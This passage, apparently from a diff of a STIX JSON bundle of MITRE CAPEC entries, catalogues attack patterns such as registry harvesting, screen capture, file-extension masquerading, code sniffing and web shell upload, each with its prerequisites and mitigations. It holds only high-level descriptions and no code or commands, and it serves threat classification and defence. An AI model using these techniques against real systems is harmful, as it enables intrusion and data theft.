Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.", + "external_references": [ + { + "external_id": "CAPEC-646", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/646.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Peripheral Device Discovery", + "external_id": "T1120", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1120" + } + ], + "id": "attack-pattern--658d6220-f15c-44fb-8690-1d14088ed637", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Peripheral Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs either physical or remote access to the victim system." + ], + "x_capec_skills_required": { + "Medium": "If analyzing the Windows registry, the adversary must understand the registry structure to know where to look for devices." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d9f6ac50-d71a-415a-a9f3-6b159c887206", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--658d6220-f15c-44fb-8690-1d14088ed637", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-647", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/647.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Query Registry", + "external_id": "T1012", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1012" + }, + { + "description": "Unsecured Credentials: Credentials in Registry", + "external_id": "T1552.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/002" + } + ], + "id": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Registries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to read sensitive information about the system in the registry.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Gain logical access to system: An adversary must first gain logical access to the system it wants to gather registry information from,

    2. Techniques
    Obtain user account credentials and access the system
    Plant malware on the system that will give remote logical access to the adversary

Experiment

  1. Determine if the permissions are correct: Once logical access is gained, an adversary will determine if they have the proper permissions, or are authorized, to view registry information. If they do not, they will need to escalate privileges on the system through other means

  2. Peruse registry for information: Once an adversary has access to a registry, they will gather all system-specific data and sensitive information that they deem useful.

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).", + "The adversary must have capability to navigate the operating system to peruse the registry." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46c95866-35f0-4eb3-8236-3cf76d28c354", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust identification and audit/blocking via using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "id": "course-of-action--b20b8831-79c4-401b-9767-4c506d59c2d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-647-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df86fcb3-a484-4707-a8c7-d61b784214bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b20b8831-79c4-401b-9767-4c506d59c2d9", + "spec_version": "2.1", + "target_ref": "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-648", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/648.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Screen Capture", + "external_id": "T1113", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1113" + }, + { + "description": "Screen Capture", + "external_id": "T1513", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1513" + } + ], + "id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Screen Capture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to capture potentially sensitive information and processes as they appear on the screen.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using allowlist tools.", + "id": "course-of-action--c4331607-533f-4210-910b-2ce3a63f070a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-648-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e4ee62c-e443-4037-aa6a-3ddddcf93324", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4331607-533f-4210-910b-2ce3a63f070a", + "spec_version": "2.1", + "target_ref": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature.", + "id": "course-of-action--ec0a0b82-9297-4d4b-8a03-975dc1cdd2e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-648-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e559a56f-da83-4f00-bf13-dda7f216f4e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec0a0b82-9297-4d4b-8a03-975dc1cdd2e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.", + "external_references": [ + { + "external_id": "CAPEC-649", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/649.html" + }, + { + "external_id": "CWE-46", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/46.html" + }, + { + "description": "Masquerading:Space after Filename", + "external_id": "T1036.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/006" + } + ], + "id": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Adding a Space to a File Extension", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "File extensions should be checked to see if non-visible characters are being included.", + "id": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-649-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06d27c54-f604-4253-9b67-9e78cfe16886", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.", + "external_references": [ + { + "external_id": "CAPEC-65", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/65.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "id": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Sniff Application Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..", + "Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Set up a sniffer: The adversary sets up a sniffer in the path between the server and the client and watches the traffic.

    2. Techniques
    The adversary sets up a sniffer in the path between the server and the client.

Exploit

  1. [Capturing Application Code Bound During Patching]adversary knows that the computer/OS/application can request new applications to install, or it periodically checks for an available update. The adversary loads the sniffer set up during Explore phase, and extracts the application code from subsequent communication. The adversary then proceeds to reverse engineer the captured code.

    2. Techniques
    adversary loads the sniffer to capture the application code bound during a dynamic update.
    The adversary proceeds to reverse engineer the captured code.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have the ability to place themself in the communication path between the client and server.", + "The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.", + "The attacker must be able to employ a sniffer on the network without being detected." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to capture communications between the client being updated and the server providing the update.\n In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client.\n " + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ an adversary-in-the-middle attack (CAPEC-94), the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Encrypt all communication between the client and server.", + "id": "course-of-action--c929e01c-c2b8-495f-bac3-4e6b80ae2d7b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f11fbd0b-3fdd-4f8c-b521-a759509f3c72", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c929e01c-c2b8-495f-bac3-4e6b80ae2d7b", + "spec_version": "2.1", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use SSL, SSH, SCP.", + "id": "course-of-action--dd68f1a2-41e9-4d58-8759-18724265ed85", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f45fd050-a931-464c-985d-2ee73ad18461", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd68f1a2-41e9-4d58-8759-18724265ed85", + "spec_version": "2.1", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: Use \"ifconfig/ipconfig\" or other tools to detect the sniffer installed in the network.", + "id": "course-of-action--f3d9104c-7744-4b8d-a0ad-eda7ccd58f13", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-65-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--817eac3b-7a9b-49f3-853d-f4f1190b3d05", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3d9104c-7744-4b8d-a0ad-eda7ccd58f13", + "spec_version": "2.1", + "target_ref": "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \"gateway\" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.", + "external_references": [ + { + "external_id": "CAPEC-650", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/650.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-553", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/553.html" + }, + { + "description": "Server Software Component:Web Shell", + "external_id": "T1505.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/003" + } + ], + "id": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Upload a Web Shell to a Web Server", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The web server is susceptible to one of the various web application exploits that allows for uploading a shell file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.", + "id": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--94978147-aaca-4748-8abc-5609dc8c0133", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the file permissions in directories on the web server from which files can be execute is set to the \"least privilege\" settings, and that those directories contents is controlled by an allowlist.", + "id": "course-of-action--3787e994-06dd-4cd3-a066-e53bd6493039", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34439947-c6ff-46d0-a607-e7439be9d509", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3787e994-06dd-4cd3-a066-e53bd6493039", + "spec_version": "2.1", + "target_ref": "attack-pattern--b9cddd44-a617-4a56-8560-0ca1cd9af42a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). Instead, it entails listening in on the raw audio source of a conversation between two or more parties.", + "external_references": [ + { + "external_id": "CAPEC-651", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/651.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Eavesdropping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (The adversary gains unauthorized access to information.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135" + ], + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, whether for physical eavesdropping or for placing recording equipment. This is not always the case for software-based eavesdropping, if the adversary has the capability to install malware on the target system that can activate a microphone and record audio digitally." + ], + "x_capec_resources_required": [ + "For logical eavesdropping, some equipment may be necessary (e.g., microphone, tape recorder, etc.). For physical eavesdropping, only proximity is required." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be mindful of your surroundings when discussing sensitive information in public areas.", + "id": "course-of-action--80199435-cd0f-4050-b9c4-faae49a620cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1641c1d2-3516-4cc2-9d1f-2358c9d3f117", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--80199435-cd0f-4050-b9c4-faae49a620cd", + "spec_version": "2.1", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.", + "id": "course-of-action--99574627-4dd1-42b3-8b6b-775ff7f38e6a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-651-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cba47b13-b50e-4cb8-8e76-8a25e15c68cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99574627-4dd1-42b3-8b6b-775ff7f38e6a", + "spec_version": "2.1", + "target_ref": "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "type": 